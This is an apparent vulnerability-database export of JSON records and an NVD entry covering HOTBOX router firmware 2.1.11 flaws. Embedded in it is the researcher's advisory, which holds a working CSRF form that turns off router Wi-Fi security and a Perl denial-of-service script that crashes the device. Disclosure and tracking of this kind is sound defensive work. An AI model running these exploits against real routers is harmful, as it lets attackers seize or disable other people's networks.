            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5037"
          },
          {
            "trust": 0.1,
            "url": "http://elisyan.com/hotboxcsrf.html"
          },
          {
            "trust": 0.1,
            "url": "http://elisyan.com/hotboxdos.pl,"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5039"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5219"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5218"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-00018"
          },
          {
            "db": "VULHUB",
            "id": "VHN-65220"
          },
          {
            "db": "BID",
            "id": "63550"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005734"
          },
          {
            "db": "PACKETSTORM",
            "id": "123901"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201312-563"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-5218"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-00018"
          },
          {
            "db": "VULHUB",
            "id": "VHN-65220"
          },
          {
            "db": "BID",
            "id": "63550"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005734"
          },
          {
            "db": "PACKETSTORM",
            "id": "123901"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201312-563"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-5218"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2014-01-02T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2014-00018"
          },
          {
            "date": "2013-12-30T00:00:00",
            "db": "VULHUB",
            "id": "VHN-65220"
          },
          {
            "date": "2013-09-09T00:00:00",
            "db": "BID",
            "id": "63550"
          },
          {
            "date": "2014-01-06T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2013-005734"
          },
          {
            "date": "2013-11-04T13:03:33",
            "db": "PACKETSTORM",
            "id": "123901"
          },
          {
            "date": "2013-12-31T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201312-563"
          },
          {
            "date": "2013-12-30T04:53:07.287000",
            "db": "NVD",
            "id": "CVE-2013-5218"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2014-01-02T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2014-00018"
          },
          {
            "date": "2013-12-30T00:00:00",
            "db": "VULHUB",
            "id": "VHN-65220"
          },
          {
            "date": "2013-09-09T00:00:00",
            "db": "BID",
            "id": "63550"
          },
          {
            "date": "2014-01-06T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2013-005734"
          },
          {
            "date": "2013-12-31T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201312-563"
          },
          {
            "date": "2025-04-11T00:51:21.963000",
            "db": "NVD",
            "id": "CVE-2013-5218"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "specific network environment",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201312-563"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "HOT HOTBOX Router Software cross-site scripting vulnerability",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005734"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "XSS",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201312-563"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201312-0376

    Vulnerability from variot - Updated: 2025-04-11 22:48

    goform/login on the HOT HOTBOX router with software 2.1.11 allows remote attackers to cause a denial of service (device crash) via crafted HTTP POST data. HOT HOTBOX router is a router device. Sagemcom f@st 3184 routers are prone to the following security vulnerabilities: 1. An Information-disclosure Vulnerability 2. An Authentication-bypass vulnerability 3. A Remote Denial-of-service Vulnerability 4. A Directory-traversal Vulnerability 5. An HTML-injection Vulnerability 6. A Cross-site Request-forgery Vulnerability An attacker can exploit these issues to gain access to potentially sensitive information, bypass certain security restrictions to perform unauthorized actions, steal cookie-based authentication credentials and gain access to system. Other attacks are also possible Sagemcom f@st 3184 running firmware 2.1.11 is vulnerable; prior versions may also be affected. +------------------------------------------------------------------------------+ | HOTBOX is the leading router/modem appliance of | | HOT Cable communication company in israel. | | The Appliance is manufactured by SAGEMCOM | | and carries the model name F@st 3184. | +------------------------------------------------------------------------------+ | Title: HOTBOX Multiple Vulnerabilities | +--------------------+---------------------------------------------------------+ | Release Date | 2013/09/09 | | Researcher | Oz Elisyan | +--------------------+---------------------------------------------------------+ | System Affected | HOTBOX Router/Modem | | Versions Affected | 2.1.11 , possibly earlier | | Related CVE Numbers | CVE-2013-5037, CVE-2013-5038| | CVE-2013-5220, CVE-2013-5219, CVE-2013-5218, | | CVE-2013-5039 | | Vendor Patched | N/A | | Classification | 0-day | | Exploits | http://elisyan.com/hotboxDoS.pl, | | http://elisyan.com/hotboxCSRF.html | +--------------------+---------------------------------------------------------+

    Vulnerabilities List -

    Default WPS Pin

    Authentication based on IP Address

    DoS via crafted POST

    Path/Directory Traversal

    Script injection via DHCP request

    No CSRF Token

    Demo - http://www.youtube.com/watch?v=CPlT09ZIj48

    CSRF EXPLOIT:

    document.getElementById(1).submit();

    DENIAL OF SERVICE EXPLOIT:

    use warnings; use HTTP::Request::Common qw(POST); use LWP::UserAgent;

    Author: Oz Elisyan

    Date: 3 September 2013

    Affected Version: <= 2.1.11

    print "# HOTBOX DoS PoC #\n\n"

    unless ($ARGV[0]){ print "Please Enter Valid Host Name.\n"; exit(); }

    print "Sending Evil POST request...\n";

    my $HOST = $ARGV[0]; my $URL = "http://$HOST/goform/login"; my $PostData = "loginUsername=aaaloginPassword=aaa" my $browser = LWP::UserAgent->new(); my $req = HTTP::Request->new(POST => $URL); $req->content_type("application/x-www-form-urlencoded"); $req->content($PostData); my $resp = $browser->request($req);

    print "Done.";

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201312-0376",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "hotbox router",
            "scope": "eq",
            "trust": 3.0,
            "vendor": "hot",
            "version": "2.1.11"
          },
          {
            "model": "hotbox router",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "hot",
            "version": null
          },
          {
            "model": "hotbox router",
            "scope": null,
            "trust": 0.8,
            "vendor": "hot",
            "version": null
          },
          {
            "model": "f@st router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sagecom",
            "version": "31842.1.11"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-00014"
          },
          {
            "db": "BID",
            "id": "63550"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005736"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201312-565"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-5220"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/h:hot:hotbox_router",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:hot:hotbox_router_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005736"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Oz Elisyan",
        "sources": [
          {
            "db": "BID",
            "id": "63550"
          },
          {
            "db": "PACKETSTORM",
            "id": "123901"
          }
        ],
        "trust": 0.4
      },
      "cve": "CVE-2013-5220",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "ADJACENT_NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 6.1,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 6.5,
                "id": "CVE-2013-5220",
                "impactScore": 6.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 1.8,
                "vectorString": "AV:A/AC:L/Au:N/C:N/I:N/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "ADJACENT_NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 6.1,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 6.5,
                "id": "CNVD-2014-00014",
                "impactScore": 6.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 0.6,
                "vectorString": "AV:A/AC:L/Au:N/C:N/I:N/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "ADJACENT_NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "COMPLETE",
                "baseScore": 6.1,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 6.5,
                "id": "VHN-65222",
                "impactScore": 6.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 0.1,
                "vectorString": "AV:A/AC:L/AU:N/C:N/I:N/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2013-5220",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "NVD",
                "id": "CVE-2013-5220",
                "trust": 0.8,
                "value": "Medium"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2014-00014",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201312-565",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "VULHUB",
                "id": "VHN-65222",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-00014"
          },
          {
            "db": "VULHUB",
            "id": "VHN-65222"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005736"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201312-565"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-5220"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "goform/login on the HOT HOTBOX router with software 2.1.11 allows remote attackers to cause a denial of service (device crash) via crafted HTTP POST data. HOT HOTBOX router is a router device. Sagemcom f@st 3184 routers are prone to the following security vulnerabilities:\n1. An Information-disclosure Vulnerability\n2. An Authentication-bypass vulnerability\n3. A Remote Denial-of-service Vulnerability\n4. A Directory-traversal Vulnerability\n5. An HTML-injection Vulnerability\n6. A Cross-site Request-forgery Vulnerability\nAn attacker can exploit these issues to  gain access to potentially  sensitive information, bypass certain security restrictions to perform  unauthorized  actions, steal cookie-based authentication credentials and  gain access to system. Other attacks are also possible\nSagemcom f@st 3184 running firmware 2.1.11 is vulnerable; prior versions may also be affected. +------------------------------------------------------------------------------+\n| HOTBOX is the leading router/modem appliance of      |\n|  HOT Cable communication company in israel.           |\n| The Appliance is manufactured by SAGEMCOM         |\n| and carries the model name F@st 3184.                     |\n+------------------------------------------------------------------------------+\n| Title: HOTBOX Multiple Vulnerabilities                         |\n+--------------------+---------------------------------------------------------+\n| Release Date       | 2013/09/09                                    |\n| Researcher         | Oz Elisyan                                     |\n+--------------------+---------------------------------------------------------+\n| System Affected    | HOTBOX Router/Modem               |\n| Versions Affected  | 2.1.11 , possibly earlier                 |\n| Related CVE Numbers | CVE-2013-5037, CVE-2013-5038|\n| CVE-2013-5220, CVE-2013-5219, CVE-2013-5218,       |\n| CVE-2013-5039                                                         |\n| Vendor Patched | N/A                                                 |\n| Classification     | 0-day                                              |\n| Exploits | http://elisyan.com/hotboxDoS.pl,                  |\n| http://elisyan.com/hotboxCSRF.html                           |\n+--------------------+---------------------------------------------------------+\n\nVulnerabilities List -\n# Default WPS Pin\n# Authentication based on IP Address\n# DoS via crafted POST\n# Path/Directory Traversal\n# Script injection via DHCP request\n# No CSRF Token\n\nDemo -\nhttp://www.youtube.com/watch?v=CPlT09ZIj48\n\n\n\nCSRF EXPLOIT: \n\n\n\u003chtml\u003e\n    \u003cform action=\u0027http://192.168.1.1/goform/wlanBasicSecurity\u0027 method=\u0027POST\u0027 id=1\u003e\n        \u003cinput type=hidden name=\"WirelessMacAddr\" value=\"C0%3AAC%3A54%3AF8%3A67%3A58\" id=\"WirelessMacAddr\"\u003e\n        \u003cinput type=hidden name=\"WirelessEnable1\" value=\"1\" id=\"WirelessEnable1\"\u003e\n\t\t\u003cinput type=hidden name=\"ServiceSetIdentifier1\" value=\"Elisyan\" id=\"ServiceSetIdentifier1\"\u003e\n\t\t\u003cinput type=hidden name=\"WirelessVendorMode\" value=\"3\" id=\"WirelessVendorMode\"\u003e\n\t\t\u003cinput type=hidden name=\"ChannelNumber1\" value=\"0\" id=\"ChannelNumber1\"\u003e\n\t\t\u003cinput type=hidden name=\"NBandwidth1\" value=\"20\" id=\"NBandwidth1\"\u003e\n\t\t\u003cinput type=hidden name=\"ClosedNetwork1\" value=\"0\" id=\"ClosedNetwork1\"\u003e\n\t\t\u003cinput type=hidden name=\"WifiSecurity\" value=\"0\" id=\"WifiSecurity\"\u003e\n\t\t\u003cinput type=hidden name=\"commitwlanBasicSecurity\" value=\"1\" id=\"commitwlanBasicSecurity\"\u003e\n\t\t\u003cinput type=hidden name=\"restoreWirelessDefaults1\" value=\"0\" id=\"restoreWirelessDefaults1\"\u003e\n\t\t\u003cinput type=hidden name=\"scanActions1\" value=\"0\" id=\"scanActions1\"\u003e\n\t\t\u003cinput type=hidden name=\"AutoSecurity1\" value=\"1\" id=\"AutoSecurity1\"\u003e\n\t\t\u003cinput type=hidden name=\"wpsActions1\" value=\"0\" id=\"wpsActions1\"\u003e\n\t\t\n\n    \u003c/form\u003e\n\u003c/html\u003e\n\u003cscript\u003edocument.getElementById(1).submit();\u003c/script\u003e\n\n\n\nDENIAL OF SERVICE EXPLOIT:\n\nuse warnings;\nuse HTTP::Request::Common qw(POST);\nuse LWP::UserAgent;\n\n\n# Author: Oz Elisyan\n# Date: 3 September 2013\n# Affected Version: \u003c= 2.1.11\n\nprint \"# HOTBOX DoS PoC #\\n\\n\"\n\nunless ($ARGV[0]){\n\tprint \"Please Enter Valid Host Name.\\n\";\n\texit();\n}\n\nprint \"Sending Evil POST request...\\n\";\n\nmy $HOST = $ARGV[0];\nmy $URL = \"http://$HOST/goform/login\";\nmy $PostData = \"loginUsername=aaaloginPassword=aaa\"\nmy $browser = LWP::UserAgent-\u003enew();\nmy $req = HTTP::Request-\u003enew(POST =\u003e $URL);\n$req-\u003econtent_type(\"application/x-www-form-urlencoded\");\n$req-\u003econtent($PostData);\nmy $resp = $browser-\u003erequest($req);\n\nprint \"Done.\";\n",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2013-5220"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005736"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2014-00014"
          },
          {
            "db": "BID",
            "id": "63550"
          },
          {
            "db": "VULHUB",
            "id": "VHN-65222"
          },
          {
            "db": "PACKETSTORM",
            "id": "123901"
          }
        ],
        "trust": 2.61
      },
      "exploit_availability": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "reference": "https://www.scap.org.cn/vuln/vhn-65222",
            "trust": 0.1,
            "type": "unknown"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-65222"
          }
        ]
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2013-5220",
            "trust": 3.5
          },
          {
            "db": "PACKETSTORM",
            "id": "123901",
            "trust": 3.2
          },
          {
            "db": "BID",
            "id": "63550",
            "trust": 0.9
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005736",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201312-565",
            "trust": 0.7
          },
          {
            "db": "CNVD",
            "id": "CNVD-2014-00014",
            "trust": 0.6
          },
          {
            "db": "EXPLOIT-DB",
            "id": "29518",
            "trust": 0.1
          },
          {
            "db": "VULHUB",
            "id": "VHN-65222",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-00014"
          },
          {
            "db": "VULHUB",
            "id": "VHN-65222"
          },
          {
            "db": "BID",
            "id": "63550"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005736"
          },
          {
            "db": "PACKETSTORM",
            "id": "123901"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201312-565"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-5220"
          }
        ]
      },
      "id": "VAR-201312-0376",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-00014"
          },
          {
            "db": "VULHUB",
            "id": "VHN-65222"
          }
        ],
        "trust": 1.325
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-00014"
          }
        ]
      },
      "last_update_date": "2025-04-11T22:48:26.705000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Top Page",
            "trust": 0.8,
            "url": "http://www.hot.net.il/heb/Main/"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005736"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-20",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-65222"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005736"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-5220"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 3.1,
            "url": "http://packetstormsecurity.com/files/123901/hotbox-2.1.11-csrf-traversal-denial-of-service.html"
          },
          {
            "trust": 2.4,
            "url": "http://www.youtube.com/watch?v=cplt09zij48"
          },
          {
            "trust": 0.8,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-5220"
          },
          {
            "trust": 0.8,
            "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-5220"
          },
          {
            "trust": 0.3,
            "url": "http://www.sagemcom.com/index.php?id=1760\u0026l=25"
          },
          {
            "trust": 0.3,
            "url": "http://seclists.org/fulldisclosure/2013/nov/17"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5038"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5220"
          },
          {
            "trust": 0.1,
            "url": "http://$host/goform/login\";"
          },
          {
            "trust": 0.1,
            "url": "http://192.168.1.1/goform/wlanbasicsecurity\u0027"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5037"
          },
          {
            "trust": 0.1,
            "url": "http://elisyan.com/hotboxcsrf.html"
          },
          {
            "trust": 0.1,
            "url": "http://elisyan.com/hotboxdos.pl,"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5039"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5219"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5218"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-00014"
          },
          {
            "db": "VULHUB",
            "id": "VHN-65222"
          },
          {
            "db": "BID",
            "id": "63550"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005736"
          },
          {
            "db": "PACKETSTORM",
            "id": "123901"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201312-565"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-5220"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-00014"
          },
          {
            "db": "VULHUB",
            "id": "VHN-65222"
          },
          {
            "db": "BID",
            "id": "63550"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005736"
          },
          {
            "db": "PACKETSTORM",
            "id": "123901"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201312-565"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-5220"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2014-01-02T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2014-00014"
          },
          {
            "date": "2013-12-30T00:00:00",
            "db": "VULHUB",
            "id": "VHN-65222"
          },
          {
            "date": "2013-09-09T00:00:00",
            "db": "BID",
            "id": "63550"
          },
          {
            "date": "2014-01-06T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2013-005736"
          },
          {
            "date": "2013-11-04T13:03:33",
            "db": "PACKETSTORM",
            "id": "123901"
          },
          {
            "date": "2013-12-31T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201312-565"
          },
          {
            "date": "2013-12-30T04:53:07.350000",
            "db": "NVD",
            "id": "CVE-2013-5220"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2014-01-02T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2014-00014"
          },
          {
            "date": "2013-12-30T00:00:00",
            "db": "VULHUB",
            "id": "VHN-65222"
          },
          {
            "date": "2013-09-09T00:00:00",
            "db": "BID",
            "id": "63550"
          },
          {
            "date": "2014-01-06T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2013-005736"
          },
          {
            "date": "2013-12-31T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201312-565"
          },
          {
            "date": "2025-04-11T00:51:21.963000",
            "db": "NVD",
            "id": "CVE-2013-5220"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "specific network environment",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201312-565"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "HOT HOTBOX Router Software  goform/login Service disruption in  (DoS) Vulnerabilities",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005736"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "input validation",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201312-565"
          }
        ],
        "trust": 0.6
      }
    }

    CVE-2013-5220 (GCVE-0-2013-5220)

    Vulnerability from nvd – Published: 2013-12-30 02:00 – Updated: 2024-08-06 17:06
    VLAI
    Summary
    goform/login on the HOT HOTBOX router with software 2.1.11 allows remote attackers to cause a denial of service (device crash) via crafted HTTP POST data.
    Severity
    No CVSS data available.
    CWE
    • n/a
    Assigner
    References
    Date Public
    2013-09-09 00:00
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-06T17:06:52.402Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "http://www.youtube.com/watch?v=CPlT09ZIj48"
              },
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html"
              }
            ],
            "title": "CVE Program Container"
          }
